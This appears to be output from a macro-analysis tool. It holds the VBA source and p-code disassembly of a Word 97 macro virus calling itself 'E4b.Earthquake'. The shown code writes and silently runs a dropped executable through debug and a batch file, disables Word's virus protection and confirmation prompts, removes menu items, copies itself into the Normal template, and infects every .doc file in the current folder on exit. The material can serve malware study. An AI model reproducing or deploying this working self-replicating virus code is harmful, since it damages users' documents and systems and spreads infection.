Print #hFile, "E 1570 FF FF F9 9F FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1580 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 1590 FF FF FF FF FF FF FF 00 FF FF FF FF FF FF FF FF"
Print #hFile, "E 15A0 FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 15C0 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 03"
Print #hFile, "E 15D0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 15E0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 15F0 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1600 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1610 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1620 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1630 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03"
Print #hFile, "E 1640 FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00"
Print #hFile, "RCX"
Print #hFile, "1550"
Print #hFile, "W"
Print #hFile, "Q"
    Close hFile
End Sub
    
Sub startv(strFile As String)
    
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, "cd\"
Print #hFile, "debug < start.scr > nul"
Print #hFile, "copy start.com start.exe"
Print #hFile, "del start.com"
Print #hFile, "del start.scr"
Print #hFile, "start"
Print #hFile, "del start.com"
Print #hFile, "del startv.bat"
Close hFile
Shell ("c:\startv.bat"), vbHide

End Sub


' Processing file: /tmp/qstore_wrjsm3id
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/E4 - 47546 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub E4())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' Line #5:
' 	QuoteRem 0x0000 0x0019 " The E4b.Earthquake Virus"
' Line #6:
' 	QuoteRem 0x0000 0x001C " Based on the E4b Virus Core"
' Line #7:
' 	QuoteRem 0x0000 0x0026 " Word 97 Macro Virus all Service Packs"
' Line #8:
' 	QuoteRem 0x0000 0x001D " Created on the 21st May 2000"
' Line #9:
' 	QuoteRem 0x0000 0x0030 " Created for Testing & Educational Purposes ONLY"
' Line #10:
' 	QuoteRem 0x0000 0x0021 " Not for Main Stream Distribution"
' Line #11:
' Line #12:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #13:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #14:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #15:
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #16:
' 	LitStr 0x0018 "Templates and Add-Ins..."
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #17:
' 	LitStr 0x0008 "Style..."
' 	LitStr 0x0006 "Format"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #18:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0014 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000C "C:\start.scr"
' 	ArgsCall (Call) Prog 0x0001 
' 	EndIf 
' Line #19:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0014 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000D "c:\startv.bat"
' 	ArgsCall (Call) startv 0x0001 
' 	EndIf 
' Line #20:
' 	LitStr 0x0009 "c:\E4.sys"
' 	LitStr 0x0002 "E4"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #21:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #22:
' 	Ld I 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0002 "E4"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NormInstall 
' 	EndIf 
' Line #23:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #25:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0002 "E4"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St ActivInstall 
' 	EndIf 
' Line #26:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #27:
' 	LineCont 0x0004 0F 00 00 00
' 	Ld ActivInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	Set Lotion 
' 	Else 
' 	BoSImplicit 
' 	Ld ActivInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	Set Lotion 
' 	EndIf 
' 	EndIf 
' Line #28:
' 	LitStr 0x0009 "c:\E4.sys"
' 	Paren 
' 	Ld Lotion 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #29:
' 	EndSub 
' Line #30:
' Line #31:
' 	FuncDefn (Sub FileNew())
' Line #32:
' 	OnError (Resume Next) 
' Line #33:
' 	ArgsCall (Call) E4 0x0000 
' Line #34:
' 	Ld wdDialogFileNew 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #35:
' 	LitDI2 0x0001 
' 	St Skip 
' Line #36:
' 	ArgsCall (Call) E4 0x0000 
' Line #37:
' 	EndSub 
' Line #38:
' 	FuncDefn (Sub FileSave())
' Line #39:
' 	OnError (Resume Next) 
' Line #40:
' 	ArgsCall (Call) E4 0x0000 
' Line #41:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #42:
' 	EndSub 
' Line #43:
' 	FuncDefn (Sub FileClose())
' Line #44:
' 	OnError (Resume Next) 
' Line #45:
' 	ArgsCall (Call) E4 0x0000 
' Line #46:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (False)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #47:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #48:
' 	EndSub 
' Line #49:
' 	FuncDefn (Sub ToolsOptions())
' Line #50:
' 	OnError (Resume Next) 
' Line #51:
' 	Ld wdDialogToolsOptions 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #52:
' 	ArgsCall (Call) E4 0x0000 
' Line #53:
' 	EndSub 
' Line #54:
' 	FuncDefn (Sub EditFind())
' Line #55:
' 	OnError (Resume Next) 
' Line #56:
' 	Ld wdDialogEditFind 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #57:
' 	ArgsCall (Call) E4 0x0000 
' Line #58:
' 	EndSub 
' Line #59:
' 	FuncDefn (Sub FileSaveAs())
' Line #60:
' 	OnError (Resume Next) 
' Line #61:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #62:
' 	ArgsCall (Call) E4 0x0000 
' Line #63:
' 	EndSub 
' Line #64:
' 	FuncDefn (Sub FilePrint())
' Line #65:
' 	OnError (Resume Next) 
' Line #66:
' 	Ld wdDialogFilePrint 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #67:
' 	ArgsCall (Call) E4 0x0000 
' Line #68:
' 	EndSub 
' Line #69:
' Line #70:
' 	FuncDefn (Sub FileExit())
' Line #71:
' 	OnError (Resume Next) 
' Line #72:
' 	ArgsCall (Call) E4 0x0000 
' Line #73:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (False)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #74:
' 	Ld wdWindowStateMinimize 
' 	Ld Application 
' 	MemSt WindowState 
' Line #75:
' 	Ld CurDir 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	St pName 
' Line #76:
' 	Ld pName 
' 	LitStr 0x0005 "*.doc"
' 	Concat 
' 	Ld sAttr 
' 	ArgsLd Dir 0x0002 
' 	St fName 
' Line #77:
' 	Ld fName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0001 "."
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0002 ".."
' 	Ne 
' 	Paren 
' 	And 
' 	Paren 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld pName 
' 	Ld fName 
' 	Concat 
' 	St InfectDoc 
' 	EndIf 
' Line #78:
' 	LineCont 0x0004 0D 00 00 00
' 	Ld InfectDoc 
' 	ParamNamed FileName 
' 	LitVarSpecial (False)
' 	ParamNamed ConfirmConversions 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnly 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0000 ""
' 	ParamNamed PasswordDocument 
' 	Ld Documents 
' 	ArgsMemCall Option 0x0005 
' Line #79:
' 	ArgsCall (Call) E4 0x0000 
' Line #80:
' 	Ld fName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	Paren 
' 	DoWhile 
' Line #81:
' 	ArgsLd Dir 0x0000 
' 	St fName 
' Line #82:
' 	LineCont 0x0004 07 00 00 00
' 	Ld fName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0001 "."
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0002 ".."
' 	Ne 
' 	Paren 
' 	And 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #83:
' 	Ld pName 
' 	Ld fName 
' 	Concat 
' 	St InfectDoc 
' Line #84:
' 	LineCont 0x0004 0D 00 00 00
' 	Ld InfectDoc 
' 	ParamNamed FileName 
' 	LitVarSpecial (False)
' 	ParamNamed ConfirmConversions 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnly 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0000 ""
' 	ParamNamed PasswordDocument 
' 	Ld Documents 
' 	ArgsMemCall Option 0x0005 
' Line #85:
' 	ArgsCall (Call) E4 0x0000 
' Line #86:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (False)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #87:
' 	EndIfBlock 
' Line #88:
' 	Loop 
' Line #89:
' 	Ld Application 
' 	ArgsMemCall Quit 0x0000 
' Line #90:
' 	EndSub 
' Line #91:
' Line #92:
' 	FuncDefn (Sub AutoExit())
' Line #93:
' 	OnError (Resume Next) 
' Line #94:
' 	ArgsCall (Call) E4 0x0000 
' Line #95:
' 	Ld wdWindowStateMinimize 
' 	Ld Application 
' 	MemSt WindowState 
' Line #96:
' 	Ld CurDir 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	St pName 
' Line #97:
' 	Ld pName 
' 	LitStr 0x0005 "*.doc"
' 	Concat 
' 	Ld sAttr 
' 	ArgsLd Dir 0x0002 
' 	St fName 
' Line #98:
' 	Ld fName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0001 "."
' 	Ne 
' 	Paren 
' 	Ld fName 
' 	LitStr 0x0002 ".."
' 	Ne 
' 	Paren 
' 	And 
' 	Paren 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld pName 
' 	Ld fName 
' 	Concat 
' 	St InfectDoc 
' 	EndIf 
' Line #99:
' 	LineCont 0x0004 0D 00 00 00
…

Open this report in the interactive analyzer, or submit your own file for analysis.